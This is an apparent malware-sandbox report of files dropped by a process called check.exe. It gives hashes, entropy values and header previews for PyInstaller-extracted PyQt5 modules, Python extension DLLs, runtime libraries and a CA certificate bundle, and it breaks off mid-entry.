C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\translations\qtbase_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	127849
Entropy (8bit):	5.83455389078597
Encrypted:	false
SSDEEP:	3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
MD5:	9C6A3721D01ECAF3F952CE96F46CE046
SHA1:	4A944E9E31DF778F7012D8E4A66497583BFD2118
SHA-256:	085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
SHA-512:	6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zh_TWB..2x..........+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."\|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtCore.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2483712
Entropy (8bit):	6.241719144701645
Encrypted:	false
SSDEEP:	49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
MD5:	678FA1496FFDEA3A530FA146DEDCDBCC
SHA1:	C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
SHA-256:	D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
SHA-512:	8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(............+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(......................... ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtGui.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2494976
Entropy (8bit):	6.232020603277999
Encrypted:	false
SSDEEP:	24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
MD5:	AE182C36F5839BADDC9DCB71192CFA7A
SHA1:	C9FA448981BA61343C7D7DECACAE300CAD416957
SHA-256:	A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
SHA-512:	8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\QtWidgets.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5144576
Entropy (8bit):	6.262739223310643
Encrypted:	false
SSDEEP:	49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
MD5:	E8C3BFBC19378E541F5F569E2023B7AA
SHA1:	ACA007030C1CEE45CBC692ADCB8BCB29665792BA
SHA-256:	A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
SHA-512:	9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..\|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\sip.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120320
Entropy (8bit):	6.034057886020456
Encrypted:	false
SSDEEP:	1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
MD5:	4F7F9E3A9466F4C0103FB04E1987E098
SHA1:	D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
SHA-256:	EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
SHA-512:	920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\VCRUNTIME140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	6.701724666218339
Encrypted:	false
SSDEEP:	768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
MD5:	68156F41AE9A04D89BB6625A5CD222D4
SHA1:	3BE29D5C53808186EBA3A024BE377EE6F267C983
SHA-256:	82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
SHA-512:	F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......\|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84240
Entropy (8bit):	6.607563436050078
Encrypted:	false
SSDEEP:	1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
MD5:	CB8C06C8FA9E61E4AC5F22EEBF7F1D00
SHA1:	D8E0DFC8127749947B09F17C8848166BAC659F0D
SHA-256:	FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
SHA-512:	E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..\|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131344
Entropy (8bit):	6.311142284249784
Encrypted:	false
SSDEEP:	3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
MD5:	A55E57D7594303C89B5F7A1D1D6F2B67
SHA1:	904A9304A07716497CF3E4EAAFD82715874C94F1
SHA-256:	F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
SHA-512:	FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	277776
Entropy (8bit):	6.5855511991551
Encrypted:	false
SSDEEP:	6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
MD5:	F3377F3DE29579140E2BBAEEFD334D4F
SHA1:	B3076C564DBDFD4CA1B7CC76F36448B0088E2341
SHA-256:	B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
SHA-512:	34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64272
Entropy (8bit):	6.220967684620152
Encrypted:	false
SSDEEP:	768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
MD5:	32D76C9ABD65A5D2671AEEDE189BC290
SHA1:	0D4440C9652B92B40BB92C20F3474F14E34F8D62
SHA-256:	838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
SHA-512:	49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	157968
Entropy (8bit):	6.854644275249963
Encrypted:	false
SSDEEP:	3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
MD5:	1BA022D42024A655CF289544AE461FB8
SHA1:	9772A31083223ECF66751FF3851D2E3303A0764C
SHA-256:	D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
SHA-512:	2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....\|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	33552
Entropy (8bit):	6.446391764486538
Encrypted:	false
SSDEEP:	384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
MD5:	1C03CAA59B5E4A7FB9B998D8C1DA165A
SHA1:	8A318F80A705C64076E22913C2206D9247D30CD7
SHA-256:	B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
SHA-512:	783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83728
Entropy (8bit):	6.331814573029388
Encrypted:	false
SSDEEP:	1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
MD5:	FE896371430BD9551717EF12A3E7E818
SHA1:	E2A7716E9CE840E53E8FC79D50A77F40B353C954
SHA-256:	35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
SHA-512:	67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m\|.ll}..o\|.ll}..h\|.ll}..i\|.ll}..m\|.ll}.lm}.ll}..m\|.ll}..a\|.ll}..l\|.ll}..}.ll}..n\|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...\|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181520
Entropy (8bit):	5.972827303352998
Encrypted:	false
SSDEEP:	3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
MD5:	1C0E3E447F719FBE2601D0683EA566FC
SHA1:	5321AB73B36675B238AB3F798C278195223CD7B1
SHA-256:	63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
SHA-512:	E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\_wmi.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38160
Entropy (8bit):	6.338856805460127
Encrypted:	false
SSDEEP:	768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
MD5:	1C30CC7DF3BD168D883E93C593890B43
SHA1:	31465425F349DAE4EDAC9D0FEABC23CE83400807
SHA-256:	6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
SHA-512:	267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\base_library.zip

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1394456
Entropy (8bit):	5.531698507573688
Encrypted:	false
SSDEEP:	12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:	A9CBD0455B46C7D14194D1F18CA8719E
SHA1:	E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:	DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:	B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:	false
Reputation:	unknown
Preview:	PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI66402\certifi\cacert.pem

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299427
Entropy (8bit):	6.047872935262006
Encrypted:	false
SSDEEP:	6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
MD5:	50EA156B773E8803F6C1FE712F746CBA
SHA1:	2C68212E96605210EDDF740291862BDF59398AEF
SHA-256:	94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
SHA-512:	01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
Malicious:	false
Reputation:	unknown
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer\md.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.818583535960129
Encrypted:	false
SSDEEP:	96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
MD5:	56FE4F6C7E88212161F49E823CCC989A
SHA1:	16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
SHA-256:	002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
SHA-512:	7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI66402\charset_normalizer\md__mypyc.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	5.953784637413928
Encrypted:	false
SSDEEP:	3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
MD5:	10116447F9276F10664BA85A5614BA3A
SHA1:	EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
SHA-256:	C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
